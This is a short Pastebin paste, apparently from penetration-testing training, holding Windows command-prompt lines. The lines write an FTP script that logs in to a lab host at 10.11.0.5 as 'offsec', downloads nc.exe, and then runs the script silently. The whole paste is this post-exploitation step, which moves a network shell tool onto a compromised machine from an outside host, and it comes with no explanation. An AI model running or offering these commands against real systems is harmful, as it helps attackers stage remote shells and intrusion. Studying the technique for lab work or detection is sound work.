Advertisement
Guest User

Untitled

a guest
Mar 21st, 2019
61
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.28 KB | None | 0 0
  1. C:\Users\offsec>echo open 10.11.0.5 21> ftp.txt
  2. C:\Users\offsec>echo USER offsec>> ftp.txt
  3. C:\Users\offsec>echo ftp>> ftp.txt
  4. C:\Users\offsec>echo bin >> ftp.txt
  5. C:\Users\offsec>echo GET nc.exe >> ftp.txt
  6. C:\Users\offsec>echo bye >> ftp.txt
  7. C:\Users\offsec>ftp -v -n -s:ftp.txt
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement